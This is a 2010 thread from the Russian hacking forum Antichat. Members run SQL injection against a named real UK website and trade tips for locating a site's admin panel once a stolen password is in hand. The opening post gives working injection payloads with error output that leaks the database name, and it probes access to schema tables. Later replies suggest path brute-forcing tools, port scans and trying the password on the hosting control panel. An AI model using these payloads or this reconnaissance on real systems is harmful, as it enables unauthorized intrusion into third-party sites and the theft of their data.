Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

28.04.2010, 19:13
|
|
Познающий
Регистрация: 16.04.2008
Сообщений: 88
Провел на форуме: 264305
Репутация:
30
|
|
pinch
http://www.looplifter.co.uk/news.asp?id=5
1. слепая sql:
http://www.looplifter.co.uk/news.asp?id=5 and '1'=(select 1)
=> так же как и при id=5
http://www.looplifter.co.uk/news.asp?id=5 and '1'=(select 2)
=> пусто
2.
http://www.looplifter.co.uk/news.asp?id=5 and 0<(select db_name())--
=>
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the nvarchar value 'Looplifter' to a column of data type int.
/news.asp, line 355
==> не такая уж и слепая
http://www.looplifter.co.uk/news.asp?id=5 and 0<(select count(*) from information_schema. columns)--
=> так же как и при id=5
http://www.looplifter.co.uk/news.asp?id=5 and 0<(select count(*) from information_schema. tables)--
=> пусто
http://www.looplifter.co.uk/news.asp?id=5 and 0<(select count(*) from information_schema.columns) and '0'<(select count(*) from information_schema.tables)--
=> пусто
http://www.looplifter.co.uk/news.asp?id=5 and 0<(select count(*) from information_schema.columns) and '0'<(select 'count(*) from information_schema.tables ')--
=> так же как и при id=5
==> наврятли там какой-то уж очень интеллектуальный фильтр, может просто запрещены права юзеру Looplifter на чтение information_schema.tables ?
Последний раз редактировалось DrakonHaSh; 28.04.2010 в 20:55..
|
|
|

28.04.2010, 19:16
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме: 540530
Репутация:
54
|
|
=))) эт не какаята хрень а MSSQL 2000
|
|
|

28.04.2010, 20:58
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
народ есть ли альтернативный способ как найти админку?
уже не первый раз сталкиваюсь с такой проблемой,пароль есть- а админку не найти ..
программой делаю перебор стандартных админок типа admin,administrator,cms,admin_panel etc...
результатов нет!
есть ли другой способ ?
|
|
|

28.04.2010, 21:54
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме: 1585404
Репутация:
564
|
|
2Konqi
http://madnet.name/tools/madss/
или юзай прогу IntelliTamper
и еще попробуй пароль к хостеру если нету админки все таки...
+проскань порты
например панелька http://188.40.XX.XX:2222/
|
|
|

28.04.2010, 21:57
|
|
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме: 247684
Репутация:
136
|
|
Сообщение от Konqi
народ есть ли альтернативный способ как найти админку?
уже не первый раз сталкиваюсь с такой проблемой,пароль есть- а админку не найти ..
программой делаю перебор стандартных админок типа admin,administrator,cms,admin_panel etc...
результатов нет!
есть ли другой способ ?
попробуй robots.txt может прокатит.......
|
|
|

28.04.2010, 22:08
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
Сообщение от AC//DC
попробуй robots.txt может прокатит.......
нету роботов,всегда проверяю
а вообще нашел хорошую прагу IntelliTampor
|
|
|

28.04.2010, 22:10
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
Сообщение от shell_c0de
2Konqi
http://madnet.name/tools/madss/
или юзай прогу IntelliTamper
и еще попробуй пароль к хостеру если нету админки все таки...
+проскань порты
например панелька http://188.40.XX.XX:2222/
спасибо,папробую
не видя твой пост сам писал про прагу
только что нашел
|
|
|

28.04.2010, 22:33
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме: 3363660
Репутация:
1148
|
|
Сообщение от Konqi
народ есть ли альтернативный способ как найти админку?
уже не первый раз сталкиваюсь с такой проблемой,пароль есть- а админку не найти ..
программой делаю перебор стандартных админок типа admin,administrator,cms,admin_panel etc...
результатов нет!
есть ли другой способ ?
http://forum.xakep.ru/m_1653053/tm.htm
Последний раз редактировалось Strilo4ka; 29.04.2010 в 18:36..
|
|
|

28.04.2010, 22:40
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
Strilo4ka спасибо
|
|
|

28.04.2010, 23:18
|
|
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме: 405538
Репутация:
23
|
|
И еще раз возвращаясь к теме вывода данных в SQL-inj в ошибках.
Правильно понимаю, что максимум можно вывести 64 символа чистых данных(единица в конце отбрасывается), и единственный выход - резать на подстроки?
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|